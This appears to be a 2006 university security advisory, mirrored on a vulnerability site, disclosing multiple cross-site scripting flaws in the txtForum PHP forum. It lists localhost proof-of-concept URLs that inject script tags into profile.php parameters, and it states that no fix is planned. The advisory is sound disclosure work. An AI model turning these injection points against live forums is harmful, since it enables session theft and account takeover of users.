Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:11764
HistoryMar 09, 2006 - 12:00 a.m.

txtForum: Multiple XSS Vulnerabilities

2006-03-0900:00:00
vulners.com
17

===========================================================
txtForum: Multiple XSS Vulnerabilities

Technical University of Vienna Security Advisory
TUVSA-0603-003, March 9, 2006

Affected applications

txtForum (http://sourceforge.net/projects/txtforum1)

Versions 1.0.4-dev and prior.

Description

There are multiple cross-site scripting (XSS) vulnerabilities which can be verified by using the following
exploits (the user needs to be logged in). They are roughly sorted by entry points (i.e., the names of the
files that have to be navigated). The vulnerabilities were discovered under the assumption that
register_globals is on, and that magic_quotes_gpc is off.

index.php

new_topic.php

profile.php

  • skins/txtforum/viewprofile.tpl, line 11

http://localhost/txtforum104/profile.php?mode=viewprofile&nick=admin&r_num=<script>alert('xss_string')</script>

  • skins/txtforum/editprofile.tpl, line 18

http://localhost/txtforum104/profile.php?mode=editprofile&r_family_name="><script>alert('xss_string')</script>

http://localhost/txtforum104/profile.php?mode=editprofile&r_homepage="><script>alert('xss_string')</script>

  • skins/txtforum/editprofile.tpl, line 39

http://localhost/txtforum104/profile.php?mode=editprofile&r_interests="><script>alert('xss_string')</script>

  • skins/txtforum/editprofile.tpl, line 43

http://localhost/txtforum104/profile.php?mode=editprofile&r_about="</textarea><script>alert('xss_string')</script>

http://localhost/txtforum104/profile.php?mode=editprofile&signature_selected1="><script>alert('xss_string')</script>

  • skins/txtforum/editprofile.tpl, line 69
    $signature_selected0: if $show_sig == 1

http://localhost/txtforum104/profile.php?mode=editprofile&signature_selected0="><script>alert('xss_string')</script>

  • skins/txtforum/editprofile.tpl, line 73
    $smile_selected1: if $show_smile == 0

http://localhost/txtforum104/profile.php?mode=editprofile&smile_selected1="><script>alert('xss_string')</script>

  • skins/txtforum/editprofile.tpl, line 73
    $smile_selected0: if $show_smile == 1

http://localhost/txtforum104/profile.php?mode=editprofile&smile_selected0="><script>alert('xss_string')</script>

  • skins/txtforum/editprofile.tpl, line 78

http://localhost/txtforum104/profile.php?mode=editprofile&ubb_selected1="><script>alert('xss_string')</script>

  • skins/txtforum/editprofile.tpl, line 78

http://localhost/txtforum104/profile.php?mode=editprofile&ubb_selected0="><script>alert('xss_string')</script>

reply.php

view_topic.php

Solution

There is no solution to these issues yet.

Timeline:

February 23, 2006:
Vulnerabilities indicated via confy at users dot sourceforge dot net.
Provided detailed report of the vulnerabilities after the author's response.
No fixes are planned.

March 9, 2006:
Advisory submission.

References

http://www.seclab.tuwien.ac.at/advisories/TUVSA-0603-003.txt

Nenad Jovanovic
Secure Systems Lab
Technical University of Vienna
www.seclab.tuwien.ac.at